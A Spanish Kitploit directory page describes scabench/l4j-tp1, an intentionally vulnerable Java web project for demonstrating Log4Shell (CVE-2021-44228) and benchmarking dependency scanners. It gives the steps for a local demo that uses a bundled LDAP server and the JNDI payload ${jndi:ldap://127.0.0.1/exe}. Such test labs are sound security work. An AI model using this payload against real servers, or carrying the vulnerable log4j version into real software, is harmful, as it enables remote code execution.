Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
l4j-tp1 — proyecto web jee con vulnerabilidad log4shell (CVE-2021-44228) | Kitploit
Herramientas/GitHubGitHub/scabench/l4j-tp1
Análisis de VulnerabilidadesExplotaciónSeguridad WebSeguridad de Cadena de SuministroAprendizaje y EducaciónLabs y Práctica
GitHubscabench/l4j-tp1

l4j-tp1

proyecto web jee con vulnerabilidad log4shell (CVE-2021-44228)

Ver Repositorio
5hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

log4shell verdadero positivo

Este es un proyecto web simple con una vulnerabilidad log4shell. El proyecto define un servicio get scabench.HelloWorldService que devuelve una cadena de texto plano hello world. El servicio no espera parámetros, y si se encuentran parámetros, se registra un error.

La dependencia vulnerable es org.apache.logging.log4j:log4j-core:2.14.1, la vulnerabilidad es CVE-2021-44228.

Demostrando la Vulnerabilidad usando una Prueba

Esto requiere unix o macos. Es fácil portar este proyecto a windows.

Se proporciona una prueba unitaria para demostrar la vulnerabilidad. La prueba requiere un servidor ldap que proporcione código vulnerable, el ejecutable correspondiente es proporcionado por el proyecto, está definido en un proyecto separado https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept basado en https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. El fixture de prueba manejará el inicio y apagado del servidor ldap.

La prueba creará un archivo foo basado en un comando codificado incrustado en el código del servidor ldap al que se conecta log4j (touch foo). Este servidor puede ser controlado por un atacante.

Descargar herramienta

Para ejecutar la prueba, construye el proyecto con mvn test.

Demostrando la Vulnerabilidad ejecutando la Aplicación

  1. inicia el servidor web embebido: mvn jetty:run
  2. inicia el servidor ldap incluido: java -jar dodgy-ldap-server.jar (el código vulnerable descargará código Java de este servidor)
  3. apunta el navegador a http://localhost:8080/, este sitio contiene un formulario pre-rellenado con una carga maliciosa ${jndi:ldap://127.0.0.1/exe}
  4. envía este formulario
  5. esto creará un archivo foo en el servidor

Ejecutando Análisis de Composición de Software

Hay varios scripts sh para ejecutar diferentes análisis, los informes de resultados se pueden encontrar en scan-results.

Generando el SBOM

El pom.xml tiene un plugin para generar un SBOM en formato CycloneDX. Para hacer esto, ejecuta mvn cyclonedx:makePackageBom, el SBOM se puede encontrar en target/ en formato json y xml.